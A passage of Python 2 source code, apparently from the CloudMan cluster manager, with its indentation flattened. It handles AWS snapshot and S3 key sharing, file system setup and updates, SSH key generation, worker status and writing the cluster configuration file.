misc.dump_yaml_to_file(sud, conf_file_name)
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
os.path.join(shared_names_root, 'persistent_data.yaml'), conf_file_name)
# Keep track of which keys were copied into the shared folder
copied_key_names = [os.path.join(shared_names_root,
'persistent_data.yaml')]
# Save the remaining cluster configuration files
try:
# Get a list of all files stored in cluster's bucket excluding
# any keys that include '/' (i.e., are folders) or the previously
# copied 'persistent_data.yaml'. This way, if the number of config
# files changes in the future, this will still work
b = s3_conn.lookup(self.app.ud['bucket_cluster'])
keys = b.list(delimiter='/')
conf_files = []
for key in keys:
if '/' not in key.name and 'persistent_data.yaml' not in key.name:
conf_files.append(key.name)
except S3ResponseError, e:
log.error("Error collecting cluster configuration files form bucket '%s': %s"
% (self.app.ud['bucket_cluster'], e))
return False
# Copy current cluster's configuration files into the shared folder
for conf_file in conf_files:
if 'clusterName' not in conf_file: # Skip original cluster name file
misc.copy_file_in_bucket(s3_conn,
self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'],
conf_file, os.path.join(
shared_names_root, conf_file),
preserve_acl=False)
copied_key_names.append(
os.path.join(shared_names_root, conf_file))
# Save the list of files contained in the shared bucket so derivative
        # instances can know what to get with minimum permissions
fl = "shared_instance_file_list.txt"
misc.dump_yaml_to_file(copied_key_names, fl)
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'], os.path.join(shared_names_root, fl), fl)
        copied_key_names.append(os.path.join(shared_names_root, fl))  # Add it to the list so its permissions get set
# Adjust permissions on the new keys and the created snapshots
ec2_conn = self.app.cloud_interface.get_ec2_connection()
for snap_id in snap_ids:
try:
if user_ids:
log.debug(
"Adding createVolumePermission for snap '%s' for users '%s'" % (snap_id, user_ids))
ec2_conn.modify_snapshot_attribute(
snap_id, attribute='createVolumePermission',
operation='add', user_ids=user_ids)
else:
ec2_conn.modify_snapshot_attribute(
snap_id, attribute='createVolumePermission',
operation='add', groups=['all'])
except EC2ResponseError, e:
log.error(
"Error modifying snapshot '%s' attribute: %s" % (snap_id, e))
err = False
if canonical_ids:
# In order to list the keys associated with a shared instance, a user
# must be given READ permissions on the cluster's bucket as a whole.
# This allows a given user to list the contents of a bucket but not
# access any of the keys other than the ones granted the permission
# next (i.e., keys required to bootstrap the shared instance)
# misc.add_bucket_user_grant(s3_conn, self.app.ud['bucket_cluster'], 'READ', canonical_ids, recursive=False)
# Grant READ permissions for the keys required to bootstrap the
# shared instance
for k_name in copied_key_names:
if not misc.add_key_user_grant(s3_conn, self.app.ud['bucket_cluster'], k_name, 'READ', canonical_ids):
log.error(
"Error adding READ permission for key '%s'" % k_name)
err = True
else: # If no canonical_ids are provided, means to set the permissions to public-read
# See above, but in order to access keys, the bucket root must be given read permissions
# FIXME: this method sets the bucket's grant to public-read and
# removes any individual user's grants - something share-a-cluster
# depends on down the line if the publicly shared instance is deleted
# misc.make_bucket_public(s3_conn, self.app.ud['bucket_cluster'])
for k_name in copied_key_names:
if not misc.make_key_public(s3_conn, self.app.ud['bucket_cluster'], k_name):
log.error("Error making key '%s' public" % k_name)
err = True
if err:
# TODO: Handle this with more user input?
log.error("Error modifying permissions for keys in bucket '%s'" %
self.app.ud['bucket_cluster'])
self._start_app_level_services()
self.cluster_manipulation_in_progress = False
return True
@synchronized(s3_rlock)
def get_shared_instances(self):
"""
Get a list of point-in-time shared instances of this cluster.
        Returns a list of such instances. Each element of the returned list is a
dictionary with ``bucket``, ``snap``, and ``visibility`` keys.
"""
lst = []
if self.app.TESTFLAG is True:
lst.append({"bucket": "cm-7834hdoeiuwha/TESTshare/2011-08-14--03-02/", "snap":
'snap-743ddw12', "visibility": 'Shared'})
lst.append({"bucket": "cm-7834hdoeiuwha/TESTshare/2011-08-19--10-49/", "snap":
'snap-gf69348h', "visibility": 'Public'})
return lst
try:
s3_conn = self.app.cloud_interface.get_s3_connection()
b = misc.get_bucket(s3_conn, self.app.ud['bucket_cluster'])
if b:
# Get a list of shared 'folders' containing clusters'
# configuration
folder_list = b.list(prefix='shared/', delimiter='/')
for folder in folder_list:
# Get snapshot assoc. with the current shared cluster
tmp_pd = 'tmp_pd.yaml'
if misc.get_file_from_bucket(
s3_conn, self.app.ud['bucket_cluster'],
os.path.join(folder.name, 'persistent_data.yaml'), tmp_pd):
tmp_ud = misc.load_yaml_file(tmp_pd)
# Currently, only a single volume snapshot can be associated
# a shared instance so pull it out of the list
if 'shared_data_snaps' in tmp_ud and len(tmp_ud['shared_data_snaps']) == 1:
snap_id = tmp_ud['shared_data_snaps'][0]
else:
snap_id = "Missing-ERROR"
try:
os.remove(tmp_pd)
except OSError:
pass # Best effort temp file cleanup
else:
snap_id = "Missing-ERROR"
# Get permission on the persistent_data file and assume
# the entire cluster shares those permissions
k = b.get_key(
os.path.join(folder.name, 'persistent_data.yaml'))
if k is not None:
acl = k.get_acl()
if 'AllUsers' in str(acl):
visibility = 'Public'
else:
visibility = 'Shared'
lst.append(
{"bucket": os.path.join(self.app.ud['bucket_cluster'],
folder.name), "snap": snap_id, "visibility": visibility})
except S3ResponseError, e:
log.error(
"Problem retrieving references to shared instances: %s" % e)
return lst
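    # Illustrative sketch of get_shared_instances' return value (entries modeled
    # on the TESTFLAG values above; bucket names and snapshot IDs are hypothetical):
    #
    #     [{'bucket': 'cm-<hash>/shared/2011-08-14--03-02/',
    #       'snap': 'snap-743ddw12', 'visibility': 'Shared'}]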
@synchronized(s3_rlock)
def delete_shared_instance(self, shared_instance_folder, snap_id):
"""
Deletes all files under shared_instance_folder (i.e., all keys with
``shared_instance_folder`` prefix) and ``snap_id``, thus deleting the
shared instance of the given cluster.
:type shared_instance_folder: str
:param shared_instance_folder: Prefix for the shared cluster instance
configuration (e.g., ``shared/2011-02-24--20-52/``)
:type snap_id: str
:param snap_id: Snapshot ID to be deleted (e.g., ``snap-04c01768``)
"""
if self.app.TESTFLAG is True:
log.debug("Tried deleting shared instance for folder '%s' and snap '%s' but TESTFLAG is set." % (
shared_instance_folder, snap_id))
return True
log.debug("Calling delete shared instance for folder '%s' and snap '%s'" % (shared_instance_folder, snap_id))
ok = True # Mark if encountered error but try to delete as much as possible
try:
s3_conn = self.app.cloud_interface.get_s3_connection()
# Revoke READ grant for users associated with the instance
# being deleted but do so only if the given users do not have
# access to any other shared instances.
# users_whose_grant_to_remove = misc.get_users_with_grant_on_only_this_folder(s3_conn, self.app.ud['bucket_cluster'], shared_instance_folder)
# if len(users_whose_grant_to_remove) > 0:
# misc.adjust_bucket_ACL(s3_conn, self.app.ud['bucket_cluster'], users_whose_grant_to_remove)
# Remove keys and folder associated with the given shared instance
b = misc.get_bucket(s3_conn, self.app.ud['bucket_cluster'])
key_list = b.list(prefix=shared_instance_folder)
for key in key_list:
log.debug(
"As part of shared cluster instance deletion, deleting key '%s' from bucket '%s'" % (key.name,
self.app.ud['bucket_cluster']))
key.delete()
except S3ResponseError, e:
log.error("Problem deleting keys in '%s': %s" % (
shared_instance_folder, e))
ok = False
# Delete the data snapshot associated with the shared instance being
# deleted
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
ec2_conn.delete_snapshot(snap_id)
log.debug(
"As part of shared cluster instance deletion, deleted snapshot '%s'" % snap_id)
except EC2ResponseError, e:
log.error(
"As part of shared cluster instance deletion, problem deleting snapshot '%s': %s" % (snap_id, e))
ok = False
return ok
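    # Hedged usage sketch for delete_shared_instance, reusing the example values
    # from its docstring:
    #
    #     self.delete_shared_instance('shared/2011-02-24--20-52/', 'snap-04c01768')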
def update_file_system(self, file_system_name):
""" This method is used to update the underlying EBS volume/snapshot
that is used to hold the provided file system. This is useful when
changes have been made to the underlying file system and those changes
        need to be preserved beyond the runtime of the current instance. After
        calling this method, terminating and later restarting the cluster instance
will preserve any changes made to the file system (provided the snapshot
created via this method has not been deleted).
The method performs the following steps:
1. Suspend all application-level services
2. Unmount and detach the volume associated with the file system
3. Create a snapshot of the volume
4. Delete references to the original file system's EBS volume
5. Add a new reference to the created snapshot, which gets picked up
by the monitor and a new volume is created and file system mounted
6. Unsuspend services
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to update file system '%s', but TESTFLAG is set." % file_system_name)
return None
log.info("Initiating file system '%s' update." % file_system_name)
self.cluster_manipulation_in_progress = True
self._stop_app_level_services()
# Initiate snapshot of the specified file system
snap_ids = []
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
found_fs_name = False # Flag to ensure provided fs name was actually found
for svc in svcs:
if svc.name == file_system_name:
found_fs_name = True
# Create a snapshot of the given volume/file system
snap_ids = svc.create_snapshot(snap_description="File system '%s' from CloudMan instance '%s'; bucket: %s"
% (file_system_name, self.app.ud['cluster_name'], self.app.ud['bucket_cluster']))
# Remove the old volume by removing the entire service
if len(snap_ids) > 0:
log.debug("Removing file system '%s' service as part of the file system update"
% file_system_name)
svc.remove()
log.debug("Creating file system '%s' from snaps '%s'" % (file_system_name, snap_ids))
fs = Filesystem(self.app, file_system_name, svc.svc_roles)
for snap_id in snap_ids:
fs.add_volume(from_snapshot_id=snap_id)
self.add_master_service(fs)
# Monitor will pick up the new service and start it up but
# need to wait until that happens before can add rest of
# the services
while fs.state != service_states.RUNNING:
log.debug("Service '%s' not quite ready: '%s'" % (
fs.get_full_name(), fs.state))
time.sleep(6)
if found_fs_name:
self._start_app_level_services()
self.cluster_manipulation_in_progress = False
log.info("File system '%s' update complete" % file_system_name)
return True
else:
log.error("Did not find file system with name '%s'; update not performed." %
file_system_name)
return False
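    # Hedged usage sketch for update_file_system; the file system name below is
    # hypothetical:
    #
    #     if self.update_file_system('galaxyData'):
    #         log.debug("File system 'galaxyData' was snapshotted and re-added")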
def add_fs_bucket(self, bucket_name, fs_name=None, fs_roles=[ServiceRole.GENERIC_FS],
bucket_a_key=None, bucket_s_key=None, persistent=False):
"""
Add a new file system service for a bucket-based file system.
"""
        log.info("Adding a file system {3} from bucket {0} (persistent: {4}; w/ creds {1}:{2})"
                 .format(bucket_name, bucket_a_key, bucket_s_key, fs_name, persistent))
fs = Filesystem(self.app, fs_name or bucket_name,
persistent=persistent, svc_roles=fs_roles)
fs.add_bucket(bucket_name, bucket_a_key, bucket_s_key)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
        # and sharing it over NFS does not seem to work)
for w_inst in self.worker_instances:
w_inst.send_add_s3fs(bucket_name, fs_roles)
log.debug("Master done adding FS from bucket {0}".format(bucket_name))
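    # Hedged example for add_fs_bucket; the bucket name and credentials below are
    # hypothetical placeholders:
    #
    #     self.add_fs_bucket('my-reference-data', fs_name='ref-data',
    #                        bucket_a_key='<access key>', bucket_s_key='<secret key>')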
@TestFlag(None)
def add_fs_volume(self, fs_name, fs_kind, vol_id=None, snap_id=None, vol_size=0,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False, dot=False):
"""
Add a new file system based on an existing volume, a snapshot, or a new
volume. Provide ``fs_kind`` to distinguish between these (accepted values
are: ``volume``, ``snapshot``, or ``new_volume``). Depending on which
kind is provided, must provide ``vol_id``, ``snap_id``, or ``vol_size``,
respectively - but not all!
"""
log.info("Adding a {0}-based file system '{1}'".format(fs_kind, fs_name))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_volume(vol_id=vol_id, size=vol_size, from_snapshot_id=snap_id, dot=dot)
self.add_master_service(fs)
log.debug("Master done adding {0}-based FS {1}".format(fs_kind, fs_name))
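    # Hedged examples of the three accepted ``fs_kind`` values for add_fs_volume;
    # the names and IDs below are hypothetical:
    #
    #     self.add_fs_volume('galaxyData', 'volume', vol_id='vol-12345678')
    #     self.add_fs_volume('galaxyData', 'snapshot', snap_id='snap-04c01768')
    #     self.add_fs_volume('galaxyData', 'new_volume', vol_size=100)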
@TestFlag(None)
def add_fs_gluster(self, gluster_server, fs_name,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False):
"""
Add a new file system service for a Gluster-based file system.
"""
log.info("Adding a Gluster-based file system {0} from Gluster server {1}".format(fs_name, gluster_server))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_glusterfs(gluster_server)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
        # and sharing it over NFS does not seem to work)
for w_inst in self.worker_instances:
# w_inst.send_add_nfs_fs(nfs_server, fs_name, fs_roles, username, pwd)
w_inst.send_mount_points()
log.debug("Master done adding FS from Gluster server {0}".format(gluster_server))
@TestFlag(None)
def add_fs_nfs(self, nfs_server, fs_name, username=None, pwd=None,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False):
"""
Add a new file system service for a NFS-based file system. Optionally,
provide password-based credentials (``username`` and ``pwd``) for
accessing the NFS server.
"""
log.info("Adding a NFS-based file system {0} from NFS server {1}".format(fs_name, nfs_server))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_nfs(nfs_server, username, pwd)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
        # and sharing it over NFS does not seem to work)
for w_inst in self.worker_instances:
# w_inst.send_add_nfs_fs(nfs_server, fs_name, fs_roles, username, pwd)
w_inst.send_mount_points()
log.debug("Master done adding FS from NFS server {0}".format(nfs_server))
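    # Hedged example for add_fs_nfs; the server address and credentials below are
    # hypothetical:
    #
    #     self.add_fs_nfs('10.0.0.5:/export/data', 'shared-data',
    #                     username='nfsuser', pwd='secret')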
def stop_worker_instances(self):
"""
Initiate termination of all worker instances.
"""
log.info("Stopping all '%s' worker instance(s)" % len(
self.worker_instances))
to_terminate = []
for i in self.worker_instances:
to_terminate.append(i)
for inst in to_terminate:
log.debug(
"Initiating termination of instance %s" % inst.get_desc())
inst.terminate()
# log.debug("Initiated termination of instance '%s'" % inst.id )
@TestFlag({}) # {'default_CM_rev': '64', 'user_CM_rev':'60'} # For testing
@synchronized(s3_rlock)
def check_for_new_version_of_CM(self):
"""
Check revision metadata for CloudMan (CM) in user's bucket and the default CM bucket.
:rtype: dict
:return: A dictionary with 'default_CM_rev' and 'user_CM_rev' keys where each key
                 maps to a string representation of an int that corresponds to the version of
CloudMan in the default repository vs. the currently running user's version.
If CloudMan is unable to determine the versions, an empty dict is returned.
"""
log.debug("Checking for new version of CloudMan")
s3_conn = self.app.cloud_interface.get_s3_connection()
user_CM_rev = misc.get_file_metadata(
s3_conn, self.app.ud['bucket_cluster'], self.app.config.cloudman_source_file_name, 'revision')
default_CM_rev = misc.get_file_metadata(
s3_conn, self.app.ud['bucket_default'], self.app.config.cloudman_source_file_name, 'revision')
log.debug("Revision number for user's CloudMan: '%s'; revision number for default CloudMan: '%s'" %
(user_CM_rev, default_CM_rev))
if user_CM_rev and default_CM_rev:
try:
if int(default_CM_rev) > int(user_CM_rev):
return {'default_CM_rev': default_CM_rev, 'user_CM_rev': user_CM_rev}
except Exception:
pass
return {}
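    # Example return value when a newer CloudMan revision is available (cf. the
    # TestFlag decorator above); an empty dict means no update or undetermined:
    #
    #     {'default_CM_rev': '64', 'user_CM_rev': '60'}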
@synchronized(s3_rlock)
def update_users_CM(self):
"""
If the revision number of CloudMan (CM) source file (as stored in file's metadata)
in user's bucket is less than that of default CM, upload the new version of CM to
user's bucket. Note that the update will take effect only after the next cluster reboot.
:rtype: bool
:return: If update was successful, return True.
Else, return False
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to update CM, but TESTFLAG is set.")
return None
if self.check_for_new_version_of_CM():
log.info("Updating CloudMan application source file in the cluster's bucket '%s'. "
"It will be automatically available the next time this cluster is instantiated."
% self.app.ud['bucket_cluster'])
s3_conn = self.app.cloud_interface.get_s3_connection()
# Make a copy of the old/original CM source and boot script in the cluster's bucket
# called 'copy_name' and 'copy_boot_name', respectively
copy_name = "%s_%s" % (
self.app.config.cloudman_source_file_name, dt.date.today())
copy_boot_name = "%s_%s" % (
self.app.ud['boot_script_name'], dt.date.today())
if misc.copy_file_in_bucket(s3_conn, self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'], self.app.config.cloudman_source_file_name, copy_name) and \
misc.copy_file_in_bucket(
s3_conn, self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'], self.app.ud['boot_script_name'], copy_boot_name):
# Now copy CloudMan source from the default bucket to cluster's bucket as
# self.app.config.cloudman_source_file_name and cm_boot.py as
# 'boot_script_name'
if misc.copy_file_in_bucket(
s3_conn, self.app.ud['bucket_default'],
self.app.ud[
'bucket_cluster'], self.app.config.cloudman_source_file_name,
self.app.config.cloudman_source_file_name) and misc.copy_file_in_bucket(s3_conn,
self.app.ud[
'bucket_default'], self.app.ud['bucket_cluster'],
'cm_boot.py', self.app.ud['boot_script_name']):
return True
return False
def expand_user_data_volume(self, new_vol_size, fs_name, snap_description=None,
delete_snap=False):
"""
Mark the file system ``fs_name`` for size expansion. For full details on how
this works, take a look at the file system expansion method for the
respective file system type.
If the underlying file system supports/requires creation of a point-in-time
snapshot, setting ``delete_snap`` to ``False`` will retain the snapshot
        that will be created during the expansion process under the given cloud account.
If the snapshot is to be kept, a brief ``snap_description`` can be provided.
"""
# Match fs_name with a service or if it's null or empty, default to
# GALAXY_DATA role
if fs_name:
svcs = self.app.manager.get_services(svc_name=fs_name)
if svcs:
svc = svcs[0]
else:
log.error("Could not initiate expansion of {0} file system because "
"the file system was not found?".format(fs_name))
return
else:
svc = self.app.manager.get_services(
svc_role=ServiceRole.GALAXY_DATA)[0]
log.debug("Marking '%s' for expansion to %sGB with snap description '%s'"
% (svc.get_full_name(), new_vol_size, snap_description))
svc.state = service_states.CONFIGURING
svc.grow = {
'new_size': new_vol_size, 'snap_description': snap_description,
'delete_snap': delete_snap}
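    # Hedged usage sketch for expand_user_data_volume; the size, name, and
    # description below are hypothetical:
    #
    #     self.expand_user_data_volume(250, 'galaxyData', delete_snap=False,
    #                                  snap_description='Pre-expansion backup')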
@TestFlag('TESTFLAG_ROOTPUBLICKEY')
def get_root_public_key(self):
"""
Generate or retrieve a public ssh key for the user running CloudMan and
return it as a string. The key file is stored in ``id_rsa.pub``.
Also, the private portion of the key is copied to ``/root/.ssh/id_rsa``
to enable passwordless login by job manager jobs.
"""
if self.root_pub_key is None:
if not os.path.exists('id_rsa'):
log.debug("Generating root user's public key...")
ret_code = subprocess.call('ssh-keygen -t rsa -N "" -f id_rsa', shell=True)
if ret_code == 0:
log.debug("Successfully generated root user's public key.")
f = open('id_rsa.pub')
self.root_pub_key = f.readline()
f.close()
# Must copy private key at least to /root/.ssh for
# passwordless login to work
shutil.copy2('id_rsa', '/root/.ssh/id_rsa')
log.debug(
"Successfully retrieved root user's public key from file.")
else:
log.error("Encountered a problem while creating root user's public key, process returned error code '%s'." % ret_code)
else: # This is master restart, so
f = open('id_rsa.pub')
self.root_pub_key = f.readline()
f.close()
if not os.path.exists('/root/.ssh/id_rsa'):
# Must copy private key at least to /root/.ssh for passwordless login to work
shutil.copy2('id_rsa', '/root/.ssh/id_rsa')
log.info("Successfully retrieved root user's public key from file.")
return self.root_pub_key
@TestFlag(None)
def save_host_cert(self, host_cert):
"""
Save host certificate ``host_cert`` to ``/root/.ssh/knowns_hosts``
"""
log.debug("Saving host certificate '%s'" % host_cert)
log.debug("Saving worker host certificate.")
f = open("/root/.ssh/known_hosts", 'a')
f.write(host_cert)
f.close()
return True
def get_workers_status(self, worker_id=None):
"""
Retrieves current status of all worker instances or of only worker
instance whose ID was passed as the parameter. Returns a dict
where instance ID's are the keys.
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to get worker status, but TESTFLAG is set.")
return {}
workers_status = {}
if worker_id:
log.info("Checking status of instance '%s'" % worker_id)
try:
reservation = self.app.cloud_interface.get_all_instances(worker_id.strip())
if reservation:
                    workers_status[reservation[0].instances[0].id] = \
                        reservation[0].instances[0].state
except Exception, e:
log.error("Error while updating instance '%s' status: %s" % (worker_id, e))
else:
            log.info("Checking status of all worker nodes...")
for w_instance in self.worker_instances:
workers_status[w_instance.id] = w_instance.get_m_state()
return workers_status
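    # Illustrative sketch of get_workers_status' return value (instance IDs and
    # states are hypothetical):
    #
    #     {'i-12345abc': 'running', 'i-67890def': 'pending'}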
def get_num_available_workers(self):
"""
Return the number of available worker nodes. A worker node is assumed
available if it is in state ``READY``.
"""
# log.debug("Gathering number of available workers" )
num_available_nodes = 0
for inst in self.worker_instances:
if inst.node_ready is True:
num_available_nodes += 1
return num_available_nodes
    # ==========================================================================
    # ============================ UTILITY METHODS =============================
    # ==========================================================================
@synchronized(s3_rlock)
def _make_file_from_list(self, input_list, file_name, bucket_name=None):
"""
Create a file from provided list so that each list element is
printed on a separate line. If bucket_name parameter is provided,
save created file to the bucket.
:rtype: bool
        :return: True if a file was created and, if requested by providing a
bucket name, successfully saved to the bucket. False if length of
provided list is 0 or bucket save fails.
"""
if len(input_list) > 0:
with open(file_name, 'w') as f:
for el in input_list:
f.write("%s\n" % el)
if bucket_name is not None:
log.debug("Saving file '%s' created from list '%s' to user's bucket '%s'." %
(file_name, input_list, bucket_name))
s3_conn = self.app.cloud_interface.get_s3_connection()
return misc.save_file_to_bucket(s3_conn, bucket_name, file_name, file_name)
else:
log.debug("Will not create file '%s' from provided list because the list is empty." %
file_name)
return False
return True
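    # Hedged example for _make_file_from_list; the list contents and file name
    # below are hypothetical:
    #
    #     self._make_file_from_list(['i-12345abc', 'i-67890def'], 'workers.txt',
    #                               bucket_name=self.app.ud['bucket_cluster'])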
def _update_file(self, file_name, search_exp, replace_exp):
"""
Search file_name for a line containing search_exp and replace that
expression with replace_exp.
:type file_name: str
:param file_name: Name of the file to modify
:type search_exp: str
:param search_exp: String for which to search
:type replace_exp: str
:param replace_exp: String used to replace search string
"""
fin = open(file_name)
fout = open("%s-tmp" % file_name, "w")
for line in fin:
fout.write(line.replace(search_exp, replace_exp))
fin.close()
fout.close()
shutil.copy("%s-tmp" % file_name, file_name)
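    # Hedged example for _update_file; the file and expressions below are
    # hypothetical:
    #
    #     self._update_file('/etc/exports', '/mnt/galaxyData_old', '/mnt/galaxyData')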
def update_etc_host(self):
"""
This method is for syncing hosts files in all workers with the master.
It will copy the master etc hosts into a shared folder and send a message
to the workers to inform them of the change.
"""
shutil.copy("/etc/hosts", paths.P_ETC_TRANSIENT_PATH)
for wrk in self.worker_instances:
wrk.send_sync_etc_host(paths.P_ETC_TRANSIENT_PATH)
def update_condor_host(self, new_worker_ip):
"""
Add the new pool to the condor big pool
"""
srvs = self.get_services(svc_role=ServiceRole.HTCONDOR)
if srvs:
srvs[0].modify_htcondor("ALLOW_WRITE", new_worker_ip)
def get_status_dict(self):
"""
Return a status dictionary for the current instance.
The dictionary includes the following keys: ``id`` of the instance;
``ld`` as a load of the instance over the past 1, 5, and 15 minutes
(e.g., ``0.00 0.02 0.39``); ``time_in_state`` as the length of time
since instance state was last changed; ``instance_type`` as the type
of the instance provisioned by the cloud; and ``public_ip`` with the
public IP address of the instance.
"""
public_ip = self.app.cloud_interface.get_public_ip()
if self.app.TESTFLAG:
num_cpus = 1
load = "0.00 0.02 0.39"
return {'id': 'localtest', 'ld': load,
'time_in_state': misc.formatSeconds(Time.now() - self.startup_time),
'instance_type': 'tester', 'public_ip': public_ip}
else:
            num_cpus = int(commands.getoutput("cat /proc/cpuinfo | grep processor | wc -l"))
            # System load in format "0.00 0.02 0.39" for the past 1, 5, and 15 minutes, respectively
            load = (commands.getoutput("cat /proc/loadavg | cut -d' ' -f1-3")).strip()
if load != 0:
lds = load.split(' ')
if len(lds) == 3:
load = "%s %s %s" % (float(lds[0]) / int(num_cpus), float(
lds[1]) / int(num_cpus), float(lds[2]) / int(num_cpus))
else:
# Debug only, this should never happen. If the interface is
# able to display this, there is load.
load = "0 0 0"
            return {'id': self.app.cloud_interface.get_instance_id(),
                    'ld': load,
                    'time_in_state': misc.formatSeconds(Time.now() - self.startup_time),
                    'instance_type': self.app.cloud_interface.get_type(),
                    'public_ip': public_ip}
class ConsoleMonitor(object):
def __init__(self, app):
self.app = app
self.num_workers_processed = 0
self.sge_was_setup = False
self.last_state_change_time = None
self.conn = comm.CMMasterComm()
if not self.app.TESTFLAG:
self.conn.setup()
self.sleeper = misc.Sleeper()
self.running = True
# Keep some local stats to be able to adjust system updates
self.last_update_time = Time.now()
self.last_system_change_time = Time.now()
self.update_frequency = 10 # Frequency (in seconds) between system updates
self.num_workers = -1
# Start the monitor thread
self.monitor_thread = threading.Thread(target=self.__monitor)
def start(self):
"""
Start the monitor thread, which monitors and manages all the services
visible to CloudMan.
"""
self.last_state_change_time = Time.now()
if not self.app.TESTFLAG:
# Set 'role' and 'clusterName' tags for the master instance
try:
i_id = self.app.cloud_interface.get_instance_id()
ir = self.app.cloud_interface.get_all_instances(i_id)
self.app.cloud_interface.add_tag(
ir[0].instances[0], 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(
ir[0].instances[0], 'role', self.app.ud['role'])
self.app.cloud_interface.add_tag(ir[0].instances[0], 'Name',
"{0}: {1}".format(self.app.ud['role'], self.app.ud['cluster_name']))
except Exception, e:
log.debug("Error setting tags on the master instance: %s" % e)
self.monitor_thread.start()
def shutdown(self):
"""
Attempts to gracefully shut down the monitor thread, in turn stopping
system updates.
"""
log.info("Monitor received stop signal")
try:
log.info("Sending stop signal to the Monitor thread")
if self.conn:
self.conn.shutdown()
self.running = False
self.sleeper.wake()
log.info("ConsoleMonitor thread stopped")
except:
pass
def _update_frequency(self):
""" Update the frequency value at which system updates are performed by the monitor.
"""
# Check if a worker was added/removed since the last update
if self.num_workers != len(self.app.manager.worker_instances):
self.last_system_change_time = Time.now()
self.num_workers = len(self.app.manager.worker_instances)
# Update frequency: as more time passes since a change in the system,
        # progressively back off on the frequency of system updates
if (Time.now() - self.last_system_change_time).seconds > 600:
self.update_frequency = 60 # If no system changes for 10 mins, run update every minute
elif (Time.now() - self.last_system_change_time).seconds > 300:
self.update_frequency = 30 # If no system changes for 5 mins, run update every 30 secs
else:
self.update_frequency = 10 # If last system change within past 5 mins, run update every 10 secs
def update_instance_sw_state(self, inst_id, state):
"""
:type inst_id: string
:type state: string
"""
log.debug("Updating local ref to instance '%s' state to '%s'" % (inst_id, state))
for inst in self.app.manager.worker_instances:
if inst.id == inst_id:
inst.sw_state = state
def expand_user_data_volume(self):
# TODO: recover services if process fails midway
log.info("Initiating user data volume resizing")
self.app.manager._stop_app_level_services()
# Grow galaxyData filesystem
svcs = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles:
log.debug("Expanding '%s'" % svc.get_full_name())
svc.expand()
self.app.manager._start_app_level_services()
return True
def create_cluster_config_file(self, file_name='persistent_data-current.yaml', addl_data=None):
"""
Capture the current cluster configuration in a file (i.e., ``persistent_data.yaml``
in cluster's bucket). The generated file is stored in CloudMan's running
directory as ``file_name``. If provided, ``addl_data`` is included in
the created configuration file.
"""
try:
cc = {} # cluster configuration
svcs = [] # list of services
fss = [] # list of filesystems
if addl_data:
cc = addl_data
cc['tags'] = self.app.cloud_interface.tags # save cloud tags, in case the cloud doesn't support them natively
for srvc in self.app.manager.services:
if srvc.svc_type == ServiceType.FILE_SYSTEM:
if srvc.persistent:
fs = {}
fs['name'] = srvc.name
fs['roles'] = ServiceRole.to_string_array(srvc.svc_roles)
fs['mount_point'] = srvc.mount_point
fs['kind'] = srvc.kind
if srvc.kind == 'bucket':
fs['ids'] = [b.bucket_name for b in srvc.buckets]
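                                # Note: 'b' is the loop variable leaked (in Python 2) from the
                                # comprehension above, so these credentials come from the last
                                # bucket; a single bucket per file system is assumed here.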
fs['access_key'] = b.a_key
fs['secret_key'] = b.s_key
elif srvc.kind == 'volume':
fs['ids'] = [v.volume_id for v in srvc.volumes]
elif srvc.kind == 'snapshot':
fs['ids'] = [
v.from_snapshot_id for v in srvc.volumes]
elif srvc.kind == 'nfs':
fs['nfs_server'] = srvc.nfs_fs.device
fs['mount_options'] = srvc.nfs_fs.mount_options
elif srvc.kind == 'gluster':
fs['gluster_server'] = srvc.gluster_fs.device
fs['mount_options'] = srvc.gluster_fs.mount_options
elif srvc.kind == 'transient':
pass
else:
                            log.error("For filesystem {0}, unknown kind: {1}"
.format(srvc.name, srvc.kind))
fss.append(fs)
else:
s = {}
s['name'] = srvc.name
s['roles'] = ServiceRole.to_string_array(srvc.svc_roles)
if ServiceRole.GALAXY in srvc.svc_roles:
s['home'] = self.app.path_resolver.galaxy_home
if ServiceRole.AUTOSCALE in srvc.svc_roles:
# We do not persist Autoscale service
pass
else:
svcs.append(s)
cc['filesystems'] = fss
cc['services'] = svcs
cc['cluster_type'] = self.app.manager.initial_cluster_type
cc['cluster_name'] = self.app.ud['cluster_name']
cc['placement'] = self.app.cloud_interface.get_zone()
cc['machine_image_id'] = self.app.cloud_interface.get_ami()
cc['persistent_data_version'] = self.app.PERSISTENT_DATA_VERSION
# If 'deployment_version' is not in UD, don't store it in the config
if 'deployment_version' in self.app.ud:
cc['deployment_version'] = self.app.ud['deployment_version']
misc.dump_yaml_to_file(cc, file_name)
# Reload the user data object in case anything has changed
self.app.ud = misc.merge_yaml_objects(cc, self.app.ud)
except Exception, e:
log.error("Problem creating cluster configuration file: '%s'" % e)
return file_name
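    # Illustrative sketch of the YAML produced by create_cluster_config_file
    # (top-level keys mirror the code above; concrete values are hypothetical):
    #
    #     filesystems:
    #       - name: galaxyData
    #         kind: volume
    #         mount_point: /mnt/galaxyData
    #         ids: [vol-12345678]
    #     services:
    #       - name: SGE
    #     cluster_type: Galaxy
    #     cluster_name: my-cluster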
@synchronized(s3_rlock)
def store_cluster_config(self):
"""
Create a cluster configuration file and store it into cluster's bucket under name
``persistent_data.yaml``. The cluster configuration is considered the set of currently
seen services in the master.
In addition, store the local Galaxy configuration files to the cluster's
bucket (do so only if they are not already there).
"""
